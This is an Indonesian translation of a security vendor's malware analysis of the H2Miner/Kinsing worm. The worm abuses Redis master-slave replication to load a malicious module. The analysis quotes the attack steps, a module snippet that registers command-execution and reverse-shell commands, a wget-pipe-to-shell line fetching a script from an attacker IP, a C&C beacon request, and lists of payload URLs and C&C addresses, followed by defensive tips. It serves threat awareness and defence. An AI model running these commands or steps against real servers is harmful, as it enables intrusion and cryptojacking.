Sehari yang lalu, salah satu server proyek saya diserang oleh worm serupa. Untuk mencari jawaban atas pertanyaan “apa itu tadi?” Saya menemukan artikel bagus dari tim Keamanan Cloud Alibaba. Karena saya tidak menemukan artikel ini di Habré, saya memutuskan untuk menerjemahkannya khusus untuk Anda <3
Masuk
Baru-baru ini, tim keamanan Alibaba Cloud menemukan wabah H2Miner secara tiba-tiba. Jenis worm berbahaya ini menggunakan kurangnya otorisasi atau kata sandi yang lemah untuk Redis sebagai gerbang ke sistem Anda, setelah itu ia menyinkronkan modul jahatnya sendiri dengan budak melalui sinkronisasi master-slave dan akhirnya mengunduh modul berbahaya ini ke mesin yang diserang dan mengeksekusi malware berbahaya. instruksi.
Di masa lalu, serangan pada sistem Anda terutama dilakukan menggunakan metode yang melibatkan tugas terjadwal atau kunci SSH yang ditulis ke mesin Anda setelah penyerang masuk ke Redis. Untungnya, metode ini tidak dapat sering digunakan karena masalah kontrol izin atau karena versi sistem yang berbeda. Namun, metode memuat modul berbahaya ini dapat langsung menjalankan perintah penyerang atau mendapatkan akses ke shell, yang berbahaya bagi sistem Anda.
Karena banyaknya server Redis yang dihosting di Internet (hampir 1 juta), tim keamanan Alibaba Cloud, sebagai pengingat, menyarankan agar pengguna tidak membagikan Redis secara online dan secara teratur memeriksa kekuatan kata sandi mereka dan apakah kata sandi mereka disusupi. seleksi cepat.
Penambang H2
H2Miner adalah botnet penambangan untuk sistem berbasis Linux yang dapat menyerang sistem Anda dengan berbagai cara, termasuk kurangnya otorisasi pada benang Hadoop, Docker, dan kerentanan eksekusi perintah jarak jauh (RCE) Redis. Botnet bekerja dengan mengunduh skrip berbahaya dan malware untuk menambang data Anda, memperluas serangan secara horizontal, dan memelihara komunikasi perintah dan kontrol (C&C).
Redis RCE
Pengetahuan tentang hal ini dibagikan oleh Pavel Toporkov di ZeroNights 2018. Setelah versi 4.0, Redis mendukung fitur pemuatan plug-in yang memberi pengguna kemampuan untuk memuat file yang dikompilasi dengan C ke dalam Redis untuk menjalankan perintah Redis tertentu. Fungsi ini, meskipun berguna, mengandung kerentanan di mana, dalam mode master-slave, file dapat disinkronkan dengan slave melalui mode sinkronisasi penuh. Ini dapat digunakan oleh penyerang untuk mentransfer file berbahaya. Setelah transfer selesai, penyerang memuat modul ke instance Redis yang diserang dan menjalankan perintah apa pun.
Analisis Cacing Malware
Baru-baru ini, tim keamanan Alibaba Cloud menemukan bahwa ukuran kelompok penambang jahat H2Miner tiba-tiba meningkat secara dramatis. Berdasarkan analisis, proses umum terjadinya serangan adalah sebagai berikut:
H2Miner menggunakan RCE Redis untuk serangan penuh. Penyerang pertama-tama menyerang server Redis yang tidak dilindungi atau server dengan kata sandi yang lemah.
Kemudian mereka menggunakan perintah tersebut config set dbfilename red2.so untuk mengubah nama file. Setelah ini, penyerang menjalankan perintah slaveof untuk mengatur alamat host replikasi master-slave.
Ketika instance Redis yang diserang membuat koneksi master-slave dengan Redis jahat yang dimiliki oleh penyerang, penyerang mengirimkan modul yang terinfeksi menggunakan perintah fullresync untuk menyinkronkan file. File red2.so kemudian akan diunduh ke mesin yang diserang. Penyerang kemudian menggunakan modul pemuatan ./red2.so untuk memuat file ini. Modul dapat menjalankan perintah dari penyerang atau memulai koneksi terbalik (pintu belakang) untuk mendapatkan akses ke mesin yang diserang.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Setelah menjalankan perintah jahat seperti / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, penyerang akan mengatur ulang nama file cadangan dan membongkar modul sistem untuk membersihkan jejak. Namun, file red2.so akan tetap ada di mesin yang diserang. Pengguna disarankan untuk memperhatikan keberadaan file mencurigakan tersebut di folder instance Redis mereka.
Selain mematikan beberapa proses berbahaya untuk mencuri sumber daya, penyerang mengikuti skrip berbahaya dengan mengunduh dan mengeksekusi file biner berbahaya ke . Artinya nama proses atau nama direktori yang mengandung kinsing pada host mungkin menunjukkan bahwa mesin tersebut telah terinfeksi virus ini.
Berdasarkan hasil rekayasa balik, malware tersebut pada dasarnya menjalankan fungsi-fungsi berikut:
- Mengunggah file dan menjalankannya
- pertambangan
- Menjaga komunikasi C&C dan menjalankan perintah penyerang
Gunakan Masscan untuk pemindaian eksternal guna memperluas pengaruh Anda. Selain itu, alamat IP server C&C dikodekan dalam program, dan host yang diserang akan berkomunikasi dengan server komunikasi C&C menggunakan permintaan HTTP, di mana informasi zombie (server yang disusupi) diidentifikasi di header HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Metode serangan lainnya
Alamat dan link yang digunakan oleh worm
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Pertama, Redis tidak boleh diakses dari Internet dan harus dilindungi dengan kata sandi yang kuat. Penting juga bagi klien untuk memeriksa bahwa tidak ada file red2.so di direktori Redis dan tidak ada “kinsing” pada nama file/proses di host.
Sumber: www.habr.com